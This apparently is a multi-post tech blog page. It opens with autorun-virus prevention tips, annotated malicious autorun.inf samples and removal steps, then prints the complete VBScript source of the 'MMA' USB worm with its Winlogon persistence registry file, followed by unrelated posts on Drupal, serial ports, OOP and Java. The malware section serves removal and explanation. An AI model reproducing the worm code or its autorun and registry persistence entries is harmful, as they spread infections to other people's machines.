Tips to prevent most virus without using anti virus

Guys as you all know that most virus run from the file  autorun.inf.. following are some tips to prevent most of them...

-- Go to run and type gpedit.msc there(you must be logged on as administrator for this)
--There under the computer configuration there is an option Administrative Templates.
-- In this you will find an option Turn Off Autoplay.
-- Double Click on that and set it to enabled and from the drop down select all drives.
-- Click on apply.

from now on no drive of yours' will autoplay.
All you have to do is to right click on the drive and select on open.
If on right clicking you find more options like Autoplay,??00 sort of things..
go to Tool->Folder Options->view-> Click on show hidden files and folders,also click on show hidden operating system files and click on apply..
Delete all the unwanted files now.

This is the simple and safe technique.

Apart from this you can explore the gpedit.msc thing for knowing more stuffs for enhancing your pc's performance and also its outlook.

And one more tip..
Never run your computer in adminstrator login al the time. Use admin login only when u want to install something, else always use the restricted login. By doing this u hardly stand a chance to be heranified by any virus. and never put in a pen drive inserted at some other place directly to your pc when in admin login. Clean it from the restricted login and then use it. Belive me you will hardly need any anti virus if you follow this simple things. 

Explanations of autorun.inf files

The Autorun file through which the Explorer.exe file runs:

[autorun]
OPEN=EXPLORER.EXE //Target exe to run
shell\open=??(&O) //command that will be displayed when we right click instead of open
shell\open\Command=EXPLORER.EXE//The Shell command that will execute when we click the first option
shell\open\Default=1//Each time its clicked one copy of Explorer.exe is run
shell\explore=?????(&X)//command that will be displayed when we right click instead of explore
shell\explore\Command=EXPLORER.EXE // Instead of ur folder/drive being explored it will run Explorer.Exe

The Autorun file through which the sals.xls.exe file runs:

[AutoRun]
open=sals.xls.exe// as soon as the removable disk is plugged in then this command is executed instead of regular shell command to be executed
shellexecute=sals.xls.exe//The shell will execute this command
shell\Auto\command=sals.xls.exe//When the drive is autoplayed this command is executed
shell=Auto//Shell will by default try to Autoplay this drive coz of this command
[VVflagRun]
aabb=kdkfjdkfk11

The Autorun file through which the your internet explorer will run each time its executed :

[AutoRun]
open=iexplore.exe
shellexecute=iexplore.exe
shell\Auto\command=iexplore.exe
shell=Auto[VVflagRun]
aabb=kdkfjdkfk11

The Autorun file through which the notepad will run each time its executed :

[autorun]
OPEN=notepad.EXE
shell\open=??(&anyname)
shell\open\Command=notepad.EXE/
shell\open\Default=1
shell\explore=?????(&anyname)/
shell\explore\Command=notepad.EXE

WARNING: Please donot use these things to cause damage to people.

Virus removal

Removing Added Registry Entries

1. Open Registry Editor. Click Start>Run, type REGEDIT, then press Enter.
2. In the left panel, double-click the following:
HKEY_CURRENT_USER>Software>Microsoft>Windows>
CurrentVersion>Run
3. In the right panel, locate and delete the entry:
MsServer = "msfir80.exe"
4. In the left panel, double-click the following:
HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>
CurrentVersion>Run
5. In the right panel, locate and delete the entry:
IMJPMIG8.2 = "msime80.exe"
6. Close Registry Editor.
Restoring AUTORUN.INF
1. Open the dropped AUTORUN.INF using Notepad. Click Start>Run, type this text string in the Open input box then press Enter:
{Malware path}\autorun.inf
2. Delete the following entries created by the malware:
[AutoRun]
open=sal.xls.exe
shellexecute=sal.xls.exe
shell\Auto\command=sal.xls.exe
shell=Auto
[VVflagRun]
aabb=kdkfjdkfk11
3. Close AUTORUN.INF and click Yes when prompted to save.
Unhide files by going to Start->Run and type in regsvr32 /u occache.dll and hit OK. Rehide files - Start->Run and type in regsvr32 occache.dll and hit OK.

Go to the following registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

DELETE the value CheckedValue in the right window. (Its type should be REG_SZ and data should be 2.)

Now create a new DWORD value called CheckedValue (same as above, except that the type is REG_DWORD). Modify the value data to 1 (0x00000001).

This should let you change the "Hidden Files and Folders" option.
Please report your results.

MMA virus and removal process

The most famous virus doing round these days is this one.. MMA.
It has mainly 4 files along with it.
1.mma.vbs(The source code of this virus)
2.mma.bat(The bat file which executes)
3.a war file named mma.
4. the autorun file(The obvious one)

Following is the source code of mma virus

'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net

on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\mma.vbs" then
isdir=true
else
a=WshShell.Run("mma.bat Open" ,0,False)
isdir=false
end if

For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("mma.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\mma.*",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
else
Of.CopyFile "mma.*",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
end if
a=WshShell.Run("mma.bat + "&d ,0,True)
End If
next

if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("mma.bat - "&dir ,0,True)
Of.CopyFile "mma.*",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
a=WshShell.Run("mma.bat + "&dir ,0,True)
end if

next

How it works?

When you double click on any drive and it doesnot open, and when you right click it it doesnot show an open or explore option, and shows something else. Then the first thing you got to do is to type the drive name in the address bar+:
once the drive is open, go to tools-> folder options-> view hidden files and folders-> uncheck hide operating system files. and click okey.
now you can see all the hidden files also. If by chance you find files named mma your pc is infected with it

Steps to remove MMA virus:

From what i have seen, i dont see any anti virus detects this virus.
What you have to do is simple:

Step1:
Stop the process named WScript.exe from your taskmanager.

Step2:
Remove all the mma virus files. By the way i forgot it also has a registry file.
Before deleting that mma.reg file, just right click it->Edit. Now save it as a .txt file.
Now delete all the mma files from all drives. To open the drive in your address bar just type the drive name +: and press Enter.

Step 3:
From the text file that you saved, Open the registry and go to that key. There will be one entry in userinit from that be sure that you just remove the Wscript entry else if you delete the key as a whole then your pc might not start. To remove just that entry,
right click on the key->modify. Now just remove the WSCript entry.
The second key which will be present in the mma.reg file, You can delete it fully.

Step4:
Just restart your explorer. And now your pc is free from MMA.

code of regitry file

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000

Removing from registry:  

Just edit the first key and remove just the reference of mma.bat. BE CAREFUL THAT YOU DONT DELETE THIS KEY ELSE YOU WONT BE ABLE TO RUN XP.

You can delete the second key safely.

 

DRUPAL

Introduction:

Drupal is a free and open source modular framework and content management system (CMS) written in the programming language PHP.Like many modern CMSs, Drupal allows the system administrator to create and organize content, customize the presentation, automate administrative tasks, and manage site visitors and contributors.

Drupal is sometimes described as a "Content Management Framework"as its capabilities extend from content management to enabling a wide range of services and transactions. Although Drupal does offer a sophisticated programming interface, basic web site installation and administration can be accomplished with no programming.

Drupal runs in many environments, including Windows, Mac OS X, Linux, FreeBSD, OpenBSD, Solaris 10, OpenSolaris and any platform that supports either the Apache (version 1.3+), or IIS (version IIS5+) Web server and the PHP language (version 4.3.3+). Drupal requires a database such as MySQL or PostgreSQL to store content and settings.

Drupal distributed under the GPL ("GNU General Public License") and is maintained and developed by a community of thousands of users and developers.

HISTORY:

Originally written by Dries Buytaert as a bulletin board system, Drupal became an open source project in 2001. Drupal is an English transliteration of the Dutch word “druppel,” which means “drop” (as in “a water droplet”). The name was taken from the now-defunct Drop.org website, whose code slowly evolved into Drupal. Buytaert wanted to call the site “dorp” (Dutch for “village,” referring to its community aspects), but made a typo when checking the domain name and thought it sounded better.

From May 2006 to April 2007, Drupal was downloaded from the Drupal.org website more than 600,000 times. A large community now helps develop Drupal.

As of July 2008, Drupal 6.3 is the latest release. 

Uses:

Drupal is a free software package that allows an individual or a community of users to easily publish, manage and organize a wide variety of content on a website. Tens of thousands of people and organizations are using Drupal to power scores of different web sites, including

Community web portals
Discussion sites
Corporate web sites
Intranet applications
Personal web sites or blogs
Aficionado sites
E-commerce applications
Resource directories
Social Networking sites

Drupal is ready to go from the moment you download it. It even has an easy-to-use web installer! The built-in functionality, combined with dozens of freely available add-on modules, will enable features such as:

Content Management Systems
Blogs
Collaborative authoring environments
Forums
Peer-to-peer networking
Newsletters
Podcasting
Picture galleries
File uploads and downloads
and much more. 

Working of Serial Ports

Serial ports are the connectors on the back of your PC that enable your computer to control devices such as modems, scanners, and printers. Although some serial ports use a 25-pin interface, most only have nine pins. One pin serves as the ground while the others handle the flow of data between a computer and its peripherals. Serial ports are also known as communication (COM) ports, and most PCs have at least one.

Unlike parallel ports which send a full byte (8 bits) of data at once, serial ports can transfer information only one bit at a time. They use a bidirectional form of communications that allows information to travel back and forth across a cable. RS-232 is the standard serial port design determined by the Electronics Industry Association (EIA). Among its other specifications, a RS-232 serial port can connect a computer to a device located more than 50 meters away.

Serial devices use an asynchronous process to control the transfer of information, relying on special start and stop bits to signal when serial data should or shouldn’t be transmitted. The asynchronous method divides information into packets of one byte each, sometimes including a special parity bit to verify the integrity of the data in each packet.

In your computer, the UART (Universal Asynchronous Receiver/Transmitter) converts the parallel data moving throughout your PC into a serial format that can be used by other serial devices. The procedure is reversed, however, when your computer receives serial data it must work with. The UART is also directly responsible for regulating the flow of serial bits.

In most serial communications, a device such as a modem is called the data communications equipment (DCE), while the computer itself is referred to as the data terminal equipment (DTE). The DCE and DTE (or two DTEs) establish a connection described as a “handshake” prior to exchanging data.

Your computer assigns an input/output (I/O) address and an interrupt request line (IRQ) to each serial port in your PC. This designation gives devices priority over each other as they attempt to communicate with your computer. Unfortunately, trouble occurs when a device is given the same I/O address or IRQ. This conflict can lead to your system shutting down or other PC problems. Therefore, make sure new serial devices are installed on only available I/O addresses and interrupts.

If you think your computer is experiencing a conflict, you can usually change your port configurations through software installed on your system. Consult your PC owner’s manual or activate your operating system’s help feature for instructions on how to fix port conflicts. Also, there are several shareware programs available that may help you detect possible conflicts as well.

Because many devices now use universal serial bus (USB) ports, computer users deal with fewer conflicts. USB ports use a different technology that offers much greater data transfer speeds than both parallel and serial ports. Also, USB ports support the connection of over 100 devices to your PC. But as long as computers continue to use modems, serial ports will probably be needed. Serial ports, despite their conflict issues, use a reliable form of data communications, and have performed quite well over the years.

OOP

Object oriented Programming can be seen as collection of objects coordinating with each other rather than the traditional old approach of programs being viewed as a set of tasks (subroutines) given to the computer (Procedural programming Model).
Each object is independent of other with a distinct role and responsibility consisting of actions or operators (which can be applied on that object) closely associated with each other. For example any OOP language sees human as an integration of its state (the data/variables or the characteristics that describe the human) and the behavior (the functions that human can perform like eat, sleep etc).
Essentially Data and its functionality is combined and wrapped around to form an object.
One principal benefit of OOP over the procedural approach is that OOP allows you to write modules that need not be changed when new objects are added. You just need to inherit that class and use the features provided by that object.
Each object is capable of receiving and sending messages to other objects, processing data.
Each object can be viewed with independent role and responsibility.
Most of modern programming languages now support OOP.

Basic Concepts of OOP

Abstraction:

Abstraction is a way to simplify complex problems.
It is a mechanism and practice to reduce and factor out details so that one can focus on few concepts at a time.
It can be achieved through composition.
It helps different objects to interact with each other.
For example, a car must have certain basic set of attributes like gearbox, steering etc. But a car is not concerned about what are the inner details of these things. All it is concerned about is that how these will work when combined together.

Encapsulation:

Concealing an object’s detail is called Encapsulation.
It is a mechanism and practice to reduce and factor out details so that one can focus on few concepts at a time.
When we do encapsulation, each class is exposed to an interface.
The basic reason for Encapsulation is to expose to the client with only that much code that is necessary for him to know. This helps in changing the core logic easily.
It can be used to hide physical storage layout for data so that if it is changed, the change is restricted to a small subset of a total program.
For example, Maruti may have a method for starting the engine but it’s not necessary that Opel must know about it. All that Opel must be concerned about is that Maruti can start the engine.

Polymorphism:

Polymorphism is the ability of an object belonging to different genre (classes/data types) respond to method calls of a method having the same name each one according to the type-specific behavior.
Polymorphism can be achieved in either of the two ways:
Overloading methods - One method signature to call different functions based on the implementation.
Overriding methods - Providing different implementation of the parent class method in the child class.
For example, accelerate() is a method of a class Car, but it has different way of implementation for each type of car. accelerate() method is overridden in each derived class to add a class specific behavior.

Properties of OOP

Class:

A class defines the abstract characteristic of an object along with its common traits. For example, a class dog must contain all general characteristic that any dog does posses and the traits (the things that any dog can do).
A class must be self descriptive and must provide modularity and structure to the program.
A class is blueprint or prototype from which objects are created.
A class models the state and behavior of a real world or an abstract object, but characteristics of the class should make sense in context.
A class must be such that even a lay man who knows the business domain must come to know what the class does by looking at it. This means that a class must be self-contained and must make sense in the context.
A class contains properties and methods which are collectively called Members of the class.
For example, we can say that class Car would consist of some common features, such as color and type of windshields (characteristics), and ability to achieve maximum speed (behavior).

Object:

An object is a particular instance of a class consisting of state and behavior of the object’s class.
For example, a car has a color, but Maruti 800 has a red color. So we can say that object Maruti 800 is an instance of class car.

Method:

An object’s abilities comprise of methods.
Method serves as a primary mechanism for object-to-object communication.
A method affects only the object which calls it and operates on its internal state.
An object Maruti 800 has an ability to accelerate. So accelerate () is one of the Maruti 800’s method.

Inheritance:

Inheritance is the same as the name suggests. A sub-class may inherit attributes and methods from its parent class and may introduce some of its own.
A sub-class is more specific version of its parent class.
It is also known as generalization.
It is intended to help reuse exiting code with little or no modifications.
Inherited class (derived class), take over attributes and behavior of the pre-existing classes.
For example, consider a class car. Then a class Maruti will inherit all the attributes of the class car like fuel tank, engine etc and methods such as economy, steering etc along with adding specific properties like shape, color, seats etc.
Inheritance is an ‘is-a’ relationship. Like Maruti is a car.
There is also one more type of inheritance that is Multiple Inheritance which may not always be supported as it is trivial to implement and use. (A class when derives more than one class i.e. has more than one parent class is said to have done Multiple Inheritance).

Message Passing:

Message passing is a way by which an object sends data to other object or invokes other objects method.
In programming world it is known as Interfacing.
For example, suppose that in our example of car class, the object of fuel tank wants to supply fuel to the engine object, it calls the appropriate method of engine in order to do so.
A pure object oriented programming language is one that supports all the above mentioned concepts and properties.

How Java works?

Java, a programming language developed by Sun Microsystems, is expected to be one of the cornerstones of building an intranet. Using Java, programmers can tie into corporate data from an intranet, enabling use of legacy systems such as databases. Java can also be used by programmers, editors, and artists to create multimedia programming. Java will also be able to create customized intranet programs for everything from workgroup computing to electronic commerce.
Java is similar to the C++ computer language and is object-oriented, which means that programs can be created by using many pre-existing components, instead of having to write the entire program from scratch. This will be a great help on intranets, since it will allow corporate programmers to share components and so build customized applications much more quickly. Java is a compiled language, which means that after a Java program is written, the program must be run through a compiler in order to turn the program into a language that a computer can understand. Java differs from other compiled languages, however. In other compiled languages, computer-specific compilers create different executable binary code for all the different computers that the program can run on. In Java, by contrast, a single compiled version of the program-called Java bytecode-is created by a compiler. Interpreters on different computers-such as a PC, Macintosh, or SPARC workstation-understand the Java bytecode and run the program. In this way, a Java program can be created once, and then used on many different kinds of computers. Java programs designed to run inside a Web browser are called applets. Applets are a subset of Java and for security reasons cannot read from or write to local files, whereas full Java can do so. Java-enabled browsers have Java bytecode interpreters in them. After a Java applet is compiled into bytecodes, it is copied to an intranet Web server and the necessary link is put in HTML. When someone on an intranet visits a home page with a Java applet on it, the applet automatically downloads to their computer. The applet doesn't wait for an invitation. That is why there is so much concern about viruses being embedded in applets. In order to run the Java applet, you will need a Web browser that has a bytecode interpreter that can run Java applets. Many browsers designed for intranets, such as Netscape, have these built into them. Since Java applets are programs that run on your computer, they could theoretically carry a virus just like any other computer program. To help ensure that no viruses can infect your computer, when a Java applet is downloaded to your computer, the applet first goes through verification-a process that checks that the bytecodes can be safely run. However, again, applets cannot read from or write to local files which are usually involved in virus attacks, so this should reduce virus infection risk substantially. After the bytecodes have been verified, the Java interpreter in the browser puts them into a restricted area in your computer's memory and runs them. By putting the applet into this special area of your computer, further care is taken that no virus can harm your computer. The Java applet is run. Applets can query databases by presenting a list of queries or data entry forms to the user. They can assist searching intranet sites by creating more sophisticated searching mechanisms than is possible with HTML. Most important, since the client's CPU cycles are used rather than the server's, all kinds of multimedia, including animation and interactivity, are possible with Java applets. Java will have special Application Programming Interfaces (APIs) and other kind of software "hooks" to allow intranet programmers to more easily integrate intranet programs such as Web browsers with existing corporate databases and networks.

Java and its features

What is Java?

Java is a powerful object oriented programming language whose syntax is similar to C, C++.
Java is a platform independent and requires just a Java Virtual Machine to be installed in the machine to be able to run the Java applications to run on the machine.
Java sticks more strictly to the object oriented principles by static binding of objects and providing Exception handling mechanism by giving Exception handling classes.
Java codes can be written in a simple notepad application also, so we can open the Java application source code and read or edit it.

Some features of Java are:

Simple: The structure of Java is a cleaner version of C++ wherein we needed structures, pointers, operator overloading, unions, header files, virtual base classes etc. Apart from this Java was built with the basic purpose of making small stand alone software which makes it simpler.

Architecture neutral: The compiled code generated by Java compiler can be executed in any processor. The compiler does this by generating byte code which has nothing to do with the architecture of the machine. It’s the java runtime that converts this byte code to native code on the fly.

Object oriented: The features of Java make it an object oriented programming language. The smallest programmatically building block of a java program is a class. No method or data structure can exist or can be accessed outside the class definition at runtime.

Portable: There are java libraries available which make the java code portable on any platform. Like there is an abstract window class and its implementation for UNIX, windows and Macintosh operating system.

Distributed: In Java we have a set of libraries that support TCP/IP protocols such as HTTP and FTP which make accessing file system in the internet an easy affair. Apart from this Java also supports RMI (Remote Method Invocation) that makes accessing remote file system also an easy job.

Multithreaded: Java gives a better real time, interactive and responsive behavior using multithreading. Implementing multithreading in java is a very simple task.

Dynamic: Java is dynamic in the sense that new functions can be added to the libraries or classes without actually bothering the client. Apart from this it is very easy to get runtime information in Java.

Robust: Java detects many possible problems at compile time itself along with checking errors at runtime which makes Java more robust. Also Java eliminates the possibility of memory overwriting or corrupting data by following a pointer model.

Secure: Java is a secure language as it allows the Java code to execute only in the Java environment and not allowing it access to other part of the computer.

Interpreted: The Java byte code can be executed on the fly on any machine on which the Java interpreter has been shipped to.

High performance: Just in time compilation technique make java a high performance programming language. The “Just in Time” (JIT) compilers convert the byte code to native code as and when needed. Also it maintains a cache of these codes that makes it faster to access the codes that have been compiled previously as they are called again and not compiled each time they are called. This improves the performance tremendously.
Apart from this, the major advantage of using java is that it has an automatic garbage collection technique which is automatically called by the JVM when the need arises.